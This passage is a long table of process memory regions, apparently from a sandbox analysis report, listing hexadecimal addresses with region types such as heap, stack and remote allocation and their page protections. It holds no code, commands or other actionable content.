heap
|
page read and write
|
||
|
7AF0000
|
heap
|
page readonly
|
||
|
1E639EA1000
|
heap
|
page read and write
|
||
|
1E639EB9000
|
heap
|
page read and write
|
||
|
1E63F150000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
2B14000
|
heap
|
page read and write
|
||
|
694E000
|
stack
|
page read and write
|
||
|
B32DEFE000
|
unkown
|
page readonly
|
||
|
2222D000
|
heap
|
page read and write
|
||
|
2D4C000
|
stack
|
page read and write
|
||
|
27201C6E000
|
heap
|
page read and write
|
||
|
280E000
|
stack
|
page read and write
|
||
|
B32EA7E000
|
stack
|
page read and write
|
||
|
6000000
|
unclassified section
|
page readonly
|
||
|
2B93000
|
trusted library allocation
|
page execute and read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
2A40000
|
remote allocation
|
page read and write
|
||
|
22A86000
|
unclassified section
|
page execute and read and write
|
||
|
FFFBBFE000
|
stack
|
page read and write
|
||
|
34A0000
|
trusted library allocation
|
page read and write
|
||
|
55EC000
|
stack
|
page read and write
|
||
|
B8C000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
223E7000
|
heap
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
27201C08000
|
heap
|
page read and write
|
||
|
21280000
|
direct allocation
|
page read and write
|
||
|
1E63F330000
|
trusted library allocation
|
page read and write
|
||
|
22AF5000
|
unclassified section
|
page execute and read and write
|
||
|
1FC202CC000
|
heap
|
page read and write
|
||
|
2A8B000
|
heap
|
page read and write
|
||
|
441E000
|
stack
|
page read and write
|
||
|
27201BF6000
|
heap
|
page read and write
|
||
|
22B50000
|
unclassified section
|
page execute and read and write
|
||
|
A349000
|
direct allocation
|
page execute and read and write
|
||
|
21EB7000
|
heap
|
page read and write
|
||
|
699F000
|
stack
|
page read and write
|
||
|
2B41000
|
heap
|
page read and write
|
||
|
22C72000
|
unclassified section
|
page execute and read and write
|
||
|
3627000
|
heap
|
page read and write
|
||
|
60D597E000
|
stack
|
page read and write
|
||
|
1E63F410000
|
heap
|
page read and write
|
||
|
1E639F13000
|
heap
|
page read and write
|
||
|
2720364C000
|
heap
|
page read and write
|
||
|
2AEF000
|
heap
|
page read and write
|
||
|
60D5C7F000
|
stack
|
page read and write
|
||
|
2AF8000
|
heap
|
page read and write
|
||
|
8FD0000
|
trusted library allocation
|
page read and write
|
||
|
1E63A3A0000
|
trusted library section
|
page read and write
|
||
|
23002000
|
unclassified section
|
page execute and read and write
|
||
|
212C0000
|
direct allocation
|
page read and write
|
||
|
1FC202B3000
|
heap
|
page read and write
|
||
|
27201C6B000
|
heap
|
page read and write
|
||
|
212F0000
|
direct allocation
|
page read and write
|
||
|
1FB6C760000
|
heap
|
page read and write
|
||
|
299D000
|
stack
|
page read and write
|
||
|
21A7D000
|
stack
|
page read and write
|
||
|
27201C17000
|
heap
|
page read and write
|
||
|
71A7000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
27201C2F000
|
heap
|
page read and write
|
||
|
1E63F1E1000
|
trusted library allocation
|
page read and write
|
||
|
455000
|
system
|
page execute and read and write
|
||
|
1E63F380000
|
remote allocation
|
page read and write
|
||
|
1FC0611B000
|
heap
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
1FC06068000
|
heap
|
page read and write
|
||
|
2B0F000
|
heap
|
page read and write
|
||
|
7FF7C121B000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
27201C40000
|
heap
|
page read and write
|
||
|
2B2C000
|
heap
|
page read and write
|
||
|
1FC07A50000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
7FF7C1560000
|
trusted library allocation
|
page read and write
|
||
|
27201C57000
|
heap
|
page read and write
|
||
|
8A38000
|
heap
|
page read and write
|
||
|
455000
|
system
|
page execute and read and write
|
||
|
30F0000
|
remote allocation
|
page read and write
|
||
|
22F16000
|
unclassified section
|
page execute and read and write
|
||
|
7E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
37C000
|
stack
|
page read and write
|
||
|
1E63F310000
|
trusted library allocation
|
page read and write
|
||
|
8F1F000
|
direct allocation
|
page execute and read and write
|
||
|
1E63F462000
|
heap
|
page read and write
|
||
|
1FC08A69000
|
trusted library allocation
|
page read and write
|
||
|
1E63A59D000
|
heap
|
page read and write
|
||
|
8A02000
|
heap
|
page read and write
|
||
|
1FC07A20000
|
heap
|
page readonly
|
||
|
6D8A000
|
heap
|
page read and write
|
||
|
7FF7C1204000
|
trusted library allocation
|
page read and write
|
||
|
21310000
|
direct allocation
|
page read and write
|
||
|
2B2A000
|
heap
|
page read and write
|
||
|
B32D9FE000
|
stack
|
page read and write
|
||
|
21BFD000
|
stack
|
page read and write
|
||
|
8D5E000
|
stack
|
page read and write
|
||
|
22DD6000
|
unclassified section
|
page execute and read and write
|
||
|
22341000
|
heap
|
page read and write
|
||
|
27203641000
|
heap
|
page read and write
|
||
|
2BAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC202C7000
|
heap
|
page read and write
|
||
|
7FF7C13B1000
|
trusted library allocation
|
page read and write
|
||
|
37AE000
|
stack
|
page read and write
|
||
|
2AF6000
|
heap
|
page read and write
|
||
|
6F6F000
|
stack
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
26FB000
|
stack
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
718C000
|
heap
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
221B7000
|
heap
|
page read and write
|
||
|
27203B0E000
|
heap
|
page read and write
|
||
|
2BC2000
|
trusted library allocation
|
page read and write
|
||
|
7F8E000
|
stack
|
page read and write
|
||
|
2BA0000
|
trusted library allocation
|
page read and write
|
||
|
1E63F25A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1410000
|
trusted library allocation
|
page read and write
|
||
|
1E63B121000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1203000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B29000
|
heap
|
page read and write
|
||
|
4500000
|
trusted library allocation
|
page read and write
|
||
|
21300000
|
direct allocation
|
page read and write
|
||
|
721D000
|
trusted library allocation
|
page read and write
|
||
|
3612000
|
heap
|
page read and write
|
||
|
313E000
|
unkown
|
page read and write
|
||
|
223E7000
|
heap
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
8FD000
|
stack
|
page read and write
|
||
|
6156000
|
heap
|
page read and write
|
||
|
27201C24000
|
heap
|
page read and write
|
||
|
1E63F45B000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
27201E9A000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
27201C1C000
|
heap
|
page read and write
|
||
|
7FF7C12B0000
|
trusted library allocation
|
page read and write
|
||
|
1FC2030A000
|
heap
|
page read and write
|
||
|
1FC09882000
|
trusted library allocation
|
page read and write
|
||
|
2B47000
|
heap
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
2BBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7790000
|
heap
|
page read and write
|
||
|
1E639E2B000
|
heap
|
page read and write
|
||
|
90C0000
|
direct allocation
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
4EFF000
|
remote allocation
|
page execute and read and write
|
||
|
27201AC0000
|
heap
|
page read and write
|
||
|
1E639E5C000
|
heap
|
page read and write
|
||
|
299F000
|
stack
|
page read and write
|
||
|
FFFBFFF000
|
stack
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
216DE000
|
stack
|
page read and write
|
||
|
7AE3000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8807000
|
stack
|
page read and write
|
||
|
60D5873000
|
stack
|
page read and write
|
||
|
7FE4000
|
heap
|
page read and write
|
||
|
288E000
|
stack
|
page read and write
|
||
|
8FE0000
|
trusted library allocation
|
page read and write
|
||
|
1E63F380000
|
remote allocation
|
page read and write
|
||
|
7FA2000
|
heap
|
page read and write
|
||
|
7E10000
|
heap
|
page read and write
|
||
|
4591000
|
trusted library allocation
|
page read and write
|
||
|
22E45000
|
unclassified section
|
page execute and read and write
|
||
|
2AAB000
|
heap
|
page read and write
|
||
|
2AFB000
|
heap
|
page read and write
|
||
|
60D60BE000
|
stack
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
27201BBF000
|
heap
|
page read and write
|
||
|
FFFC0FE000
|
stack
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
617B000
|
heap
|
page read and write
|
||
|
1E63F465000
|
heap
|
page read and write
|
||
|
8227000
|
trusted library allocation
|
page read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
1E63A55B000
|
heap
|
page read and write
|
||
|
2B90000
|
trusted library allocation
|
page read and write
|
||
|
7F4D000
|
stack
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
1FC07B30000
|
heap
|
page read and write
|
||
|
2720364C000
|
heap
|
page read and write
|
||
|
3750000
|
trusted library allocation
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
1FB6C56B000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
21270000
|
direct allocation
|
page read and write
|
||
|
820C000
|
stack
|
page read and write
|
||
|
509F000
|
stack
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
22C80000
|
unclassified section
|
page execute and read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
60B5000
|
unclassified section
|
page execute and read and write
|
||
|
60D5A7F000
|
stack
|
page read and write
|
||
|
6BAD000
|
stack
|
page read and write
|
||
|
A31F000
|
direct allocation
|
page execute and read and write
|
||
|
1FC07A80000
|
trusted library allocation
|
page read and write
|
||
|
614B000
|
heap
|
page read and write
|
||
|
1E63F210000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
4E0F000
|
stack
|
page read and write
|
||
|
62B0000
|
unclassified section
|
page execute and read and write
|
||
|
B32EBFE000
|
unkown
|
page readonly
|
||
|
219FC000
|
stack
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1200000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1550000
|
trusted library allocation
|
page read and write
|
||
|
1FC20600000
|
heap
|
page read and write
|
||
|
1E63ADC0000
|
trusted library section
|
page readonly
|
||
|
22A10000
|
unclassified section
|
page execute and read and write
|
||
|
FFFBAFE000
|
stack
|
page read and write
|
||
|
27201C44000
|
heap
|
page read and write
|
||
|
1E63A500000
|
heap
|
page read and write
|
||
|
27201C4E000
|
heap
|
page read and write
|
||
|
2B0E000
|
heap
|
page read and write
|
||
|
2B4A000
|
heap
|
page read and write
|
||
|
27201BB0000
|
heap
|
page read and write
|
||
|
44AC000
|
stack
|
page read and write
|
||
|
6212000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1510000
|
trusted library allocation
|
page read and write
|
||
|
1E639F29000
|
heap
|
page read and write
|
||
|
90B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
68C000
|
stack
|
page read and write
|
||
|
2179B000
|
stack
|
page read and write
|
||
|
1FC2005D000
|
heap
|
page read and write
|
||
|
21290000
|
direct allocation
|
page read and write
|
||
|
1E63F2B0000
|
trusted library allocation
|
page read and write
|
||
|
3607000
|
heap
|
page read and write
|
||
|
1E63F1C0000
|
trusted library allocation
|
page read and write
|
||
|
700000
|
unclassified section
|
page readonly
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
6AEB000
|
stack
|
page read and write
|
||
|
7AFD000
|
heap
|
page read and write
|
||
|
6B50000
|
direct allocation
|
page read and write
|
||
|
6C8000
|
stack
|
page read and write
|
||
|
C70000
|
unclassified section
|
page readonly
|
||
|
55FB000
|
trusted library allocation
|
page read and write
|
||
|
5CDE000
|
trusted library allocation
|
page read and write
|
||
|
212E0000
|
direct allocation
|
page read and write
|
||
|
AD49000
|
direct allocation
|
page execute and read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
60D6C0B000
|
stack
|
page read and write
|
||
|
50F0000
|
heap
|
page read and write
|
||
|
23020000
|
unclassified section
|
page execute and read and write
|
||
|
79A1000
|
heap
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
1E63ADA0000
|
trusted library section
|
page readonly
|
||
|
21B3E000
|
stack
|
page read and write
|
||
|
3500000
|
heap
|
page readonly
|
||
|
60E0000
|
heap
|
page read and write
|
||
|
1FC07A40000
|
heap
|
page execute and read and write
|
||
|
5A98000
|
trusted library allocation
|
page read and write
|
||
|
1FB6C7C0000
|
heap
|
page read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
6192000
|
heap
|
page read and write
|
||
|
7FF7C1520000
|
trusted library allocation
|
page read and write
|
||
|
2BC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
27201C17000
|
heap
|
page read and write
|
||
|
22140000
|
heap
|
page read and write
|
||
|
6209000
|
trusted library allocation
|
page read and write
|
||
|
7150000
|
heap
|
page read and write
|
||
|
33E8000
|
heap
|
page read and write
|
||
|
22FA0000
|
unclassified section
|
page execute and read and write
|
||
|
27203647000
|
heap
|
page read and write
|
||
|
6B20000
|
direct allocation
|
page read and write
|
||
|
27203652000
|
heap
|
page read and write
|
||
|
71B0000
|
heap
|
page execute and read and write
|
||
|
2B4F000
|
heap
|
page read and write
|
||
|
60D5FBE000
|
stack
|
page read and write
|
||
|
550000
|
unclassified section
|
page readonly
|
||
|
7EAA000
|
trusted library allocation
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
1E63F320000
|
trusted library allocation
|
page read and write
|
||
|
6B30000
|
direct allocation
|
page read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
2B9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CAD000
|
stack
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
229D0000
|
unclassified section
|
page execute and read and write
|
||
|
1E63F2C0000
|
trusted library allocation
|
page read and write
|
||
|
1E639E8A000
|
heap
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
7A90000
|
heap
|
page read and write
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
1E639E78000
|
heap
|
page read and write
|
||
|
27201C1D000
|
heap
|
page read and write
|
||
|
7FD8000
|
heap
|
page read and write
|
||
|
1E63F1E7000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1540000
|
trusted library allocation
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
7B82000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
6192000
|
heap
|
page read and write
|
||
|
7FF0000
|
heap
|
page read and write
|
||
|
1FC20050000
|
heap
|
page read and write
|
||
|
4A7F000
|
stack
|
page read and write
|
||
|
2B07000
|
heap
|
page read and write
|
||
|
21240000
|
direct allocation
|
page read and write
|
||
|
60D5BFE000
|
stack
|
page read and write
|
||
|
1FC05FE0000
|
heap
|
page read and write
|
||
|
2846000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
223B6000
|
heap
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
2FCF000
|
stack
|
page read and write
|
||
|
2236E000
|
heap
|
page read and write
|
||
|
22D55000
|
unclassified section
|
page execute and read and write
|
||
|
27201C71000
|
heap
|
page read and write
|
||
|
1E639E90000
|
heap
|
page read and write
|
||
|
2A1E000
|
stack
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
35C2000
|
heap
|
page read and write
|
||
|
22341000
|
heap
|
page read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
34D2000
|
trusted library allocation
|
page read and write
|
||
|
1E63F42A000
|
heap
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
2B08000
|
heap
|
page read and write
|
||
|
1E63F210000
|
trusted library allocation
|
page read and write
|
||
|
370C000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
5140000
|
direct allocation
|
page read and write
|
||
|
1E63A55C000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FF7C13F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
218CF000
|
stack
|
page read and write
|
||
|
7EF0000
|
trusted library allocation
|
page read and write
|
||
|
27201BBD000
|
heap
|
page read and write
|
||
|
1E63F486000
|
heap
|
page read and write
|
||
|
27203642000
|
heap
|
page read and write
|
||
|
27201BAF000
|
heap
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
2192E000
|
stack
|
page read and write
|
||
|
B749000
|
direct allocation
|
page execute and read and write
|
||
|
27201C1A000
|
heap
|
page read and write
|
||
|
54D7000
|
heap
|
page read and write
|
||
|
1FC202F8000
|
heap
|
page read and write
|
||
|
7D7D000
|
stack
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
60C5000
|
heap
|
page read and write
|
||
|
8F90000
|
trusted library allocation
|
page read and write
|
||
|
89C4000
|
heap
|
page read and write
|
||
|
DF49000
|
direct allocation
|
page execute and read and write
|
||
|
50E0000
|
heap
|
page read and write
|
||
|
616E000
|
heap
|
page read and write
|
||
|
34D0000
|
trusted library allocation
|
page read and write
|
||
|
1E639D00000
|
heap
|
page read and write
|
||
|
4BCF000
|
stack
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
830C000
|
stack
|
page read and write
|
||
|
8BD5000
|
trusted library allocation
|
page read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
4DA1000
|
trusted library allocation
|
page read and write
|
||
|
7F600000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1400000
|
trusted library allocation
|
page read and write
|
||
|
2196E000
|
stack
|
page read and write
|
||
|
2ABE000
|
heap
|
page read and write
|
||
|
22122000
|
unclassified section
|
page execute and read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
2AEF000
|
heap
|
page read and write
|
||
|
21D12000
|
unclassified section
|
page execute and read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
27201E9D000
|
heap
|
page read and write
|
||
|
4588000
|
heap
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
||
|
13C000
|
stack
|
page read and write
|
||
|
7FF7C13BA000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
23150000
|
direct allocation
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
27201BCA000
|
heap
|
page read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
27203B1C000
|
heap
|
page read and write
|
||
|
B32E97E000
|
stack
|
page read and write
|
||
|
1FC202EA000
|
heap
|
page read and write
|
||
|
223B6000
|
heap
|
page read and write
|
||
|
21EB8000
|
heap
|
page read and write
|
||
|
27201BBC000
|
heap
|
page read and write
|
||
|
27201C28000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
B32DAF7000
|
stack
|
page read and write
|
||
|
27203B0A000
|
heap
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
D3D54FD000
|
stack
|
page read and write
|
||
|
362D000
|
heap
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
21320000
|
direct allocation
|
page read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
1E639EFD000
|
heap
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
27201BB0000
|
heap
|
page read and write
|
||
|
60D0000
|
heap
|
page read and write
|
||
|
7FF7C1202000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C12BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFFBEFE000
|
stack
|
page read and write
|
||
|
7FF7C1420000
|
trusted library allocation
|
page read and write
|
||
|
1E63F380000
|
remote allocation
|
page read and write
|
||
|
1FC06070000
|
heap
|
page read and write
|
||
|
90A0000
|
direct allocation
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
1E639E00000
|
heap
|
page read and write
|
||
|
222A4000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
27201E90000
|
heap
|
page read and write
|
||
|
27201C2B000
|
heap
|
page read and write
|
||
|
445B000
|
trusted library allocation
|
page read and write
|
||
|
27201C1C000
|
heap
|
page read and write
|
||
|
4440000
|
heap
|
page read and write
|
||
|
8D1B000
|
stack
|
page read and write
|
||
|
27201C3A000
|
heap
|
page read and write
|
||
|
4458000
|
trusted library allocation
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
22772000
|
unclassified section
|
page execute and read and write
|
||
|
27201C1B000
|
heap
|
page read and write
|
||
|
1E63A55C000
|
heap
|
page read and write
|
||
|
22E82000
|
unclassified section
|
page execute and read and write
|
||
|
5130000
|
direct allocation
|
page read and write
|
||
|
7F90000
|
heap
|
page read and write
|
||
|
1E63F455000
|
heap
|
page read and write
|
||
|
27203645000
|
heap
|
page read and write
|
||
|
7FBA000
|
heap
|
page read and write
|
||
|
7B10000
|
direct allocation
|
page read and write
|
||
|
2AB5000
|
heap
|
page read and write
|
||
|
54C9000
|
heap
|
page read and write
|
||
|
B32DCFE000
|
unkown
|
page readonly
|
||
|
3220000
|
heap
|
page read and write
|
||
|
34A9000
|
trusted library allocation
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22000000
|
heap
|
page read and write
|
||
|
C149000
|
direct allocation
|
page execute and read and write
|
||
|
1D0000
|
remote allocation
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
2222D000
|
heap
|
page read and write
|
||
|
5203000
|
trusted library allocation
|
page read and write
|
||
|
357F000
|
stack
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
7F340000
|
trusted library allocation
|
page execute and read and write
|
||
|
27201BF6000
|
heap
|
page read and write
|
||
|
27201C5C000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
1FC07A10000
|
trusted library allocation
|
page read and write
|
||
|
22D60000
|
unclassified section
|
page execute and read and write
|
||
|
60D5DBE000
|
stack
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
7A9A000
|
heap
|
page read and write
|
||
|
7C57000
|
trusted library allocation
|
page read and write
|
||
|
51A1000
|
trusted library allocation
|
page read and write
|
||
|
36CF000
|
stack
|
page read and write
|
||
|
8DDD000
|
stack
|
page read and write
|
||
|
B32E6FE000
|
unkown
|
page readonly
|
||
|
8FF0000
|
trusted library allocation
|
page read and write
|
||
|
22100000
|
unclassified section
|
page execute and read and write
|
||
|
27201C17000
|
heap
|
page read and write
|
||
|
368A000
|
heap
|
page read and write
|
||
|
1FC0989B000
|
trusted library allocation
|
page read and write
|
||
|
23166000
|
direct allocation
|
page execute and read and write
|
||
|
5DD000
|
stack
|
page read and write
|
||
|
7B03000
|
heap
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
2AF2000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
3470000
|
trusted library section
|
page read and write
|
||
|
2DE0000
|
remote allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
5A9A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14E0000
|
trusted library allocation
|
page read and write
|
||
|
4BDA000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
7FEC000
|
heap
|
page read and write
|
||
|
B32F4FB000
|
stack
|
page read and write
|
||
|
7FF7C1470000
|
trusted library allocation
|
page read and write
|
||
|
7E07000
|
stack
|
page read and write
|
||
|
2A60000
|
trusted library section
|
page read and write
|
||
|
23105000
|
unclassified section
|
page execute and read and write
|
||
|
7FF7C1490000
|
trusted library allocation
|
page read and write
|
||
|
2B2F000
|
heap
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
1E63A701000
|
trusted library allocation
|
page read and write
|
||
|
1E63AD90000
|
trusted library section
|
page readonly
|
||
|
27201E9C000
|
heap
|
page read and write
|
||
|
27203641000
|
heap
|
page read and write
|
||
|
6060000
|
unclassified section
|
page execute and read and write
|
||
|
D3D55FE000
|
unkown
|
page read and write
|
||
|
27201E95000
|
heap
|
page read and write
|
||
|
3010000
|
remote allocation
|
page execute and read and write
|
||
|
4C95000
|
trusted library allocation
|
page read and write
|
||
|
21F2D000
|
heap
|
page read and write
|
||
|
7FF7C12B6000
|
trusted library allocation
|
page read and write
|
||
|
C80000
|
unclassified section
|
page readonly
|
||
|
27201C0C000
|
heap
|
page read and write
|
||
|
4420000
|
heap
|
page readonly
|
||
|
22C50000
|
unclassified section
|
page execute and read and write
|
||
|
4E4D000
|
stack
|
page read and write
|
||
|
CFD000
|
stack
|
page read and write
|
||
|
2B1F000
|
heap
|
page read and write
|
||
|
27201BCA000
|
heap
|
page read and write
|
||
|
60D613B000
|
stack
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C120D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ECF000
|
unkown
|
page read and write
|
||
|
4D5E000
|
trusted library allocation
|
page read and write
|
||
|
22B32000
|
unclassified section
|
page execute and read and write
|
||
|
27201C39000
|
heap
|
page read and write
|
||
|
6192000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
27201E9A000
|
heap
|
page read and write
|
||
|
3AFF000
|
remote allocation
|
page execute and read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
7C60000
|
heap
|
page execute and read and write
|
||
|
B32F07E000
|
stack
|
page read and write
|
||
|
7FF7C13A0000
|
trusted library allocation
|
page read and write
|
||
|
34BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC17B4F000
|
trusted library allocation
|
page read and write
|
||
|
27201C21000
|
heap
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
2AFA000
|
heap
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page execute and read and write
|
||
|
5150000
|
direct allocation
|
page read and write
|
||
|
7550000
|
direct allocation
|
page read and write
|
||
|
2C3A000
|
heap
|
page read and write
|
||
|
1FC09777000
|
trusted library allocation
|
page read and write
|
||
|
23170000
|
heap
|
page read and write
|
||
|
5120000
|
direct allocation
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
288C000
|
stack
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E63F473000
|
heap
|
page read and write
|
||
|
27201BD7000
|
heap
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
8810000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
1FC07B41000
|
trusted library allocation
|
page read and write
|
||
|
1FC17CF5000
|
trusted library allocation
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
615F000
|
heap
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page execute and read and write
|
||
|
60D5D3E000
|
stack
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27201B80000
|
heap
|
page read and write
|
||
|
4E27000
|
trusted library allocation
|
page read and write
|
||
|
23120000
|
unclassified section
|
page execute and read and write
|
||
|
B32E7FE000
|
unkown
|
page readonly
|
||
|
6161000
|
heap
|
page read and write
|
||
|
2720364C000
|
heap
|
page read and write
|
||
|
2720364C000
|
heap
|
page read and write
|
||
|
27203AE4000
|
heap
|
page read and write
|
||
|
22DF0000
|
unclassified section
|
page execute and read and write
|
||
|
1E63A51A000
|
heap
|
page read and write
|
||
|
1E63A55B000
|
heap
|
page read and write
|
||
|
223B6000
|
heap
|
page read and write
|
||
|
27201C2C000
|
heap
|
page read and write
|
||
|
291D000
|
stack
|
page read and write
|
||
|
2AF1000
|
heap
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
614B000
|
heap
|
page read and write
|
||
|
8D9E000
|
stack
|
page read and write
|
||
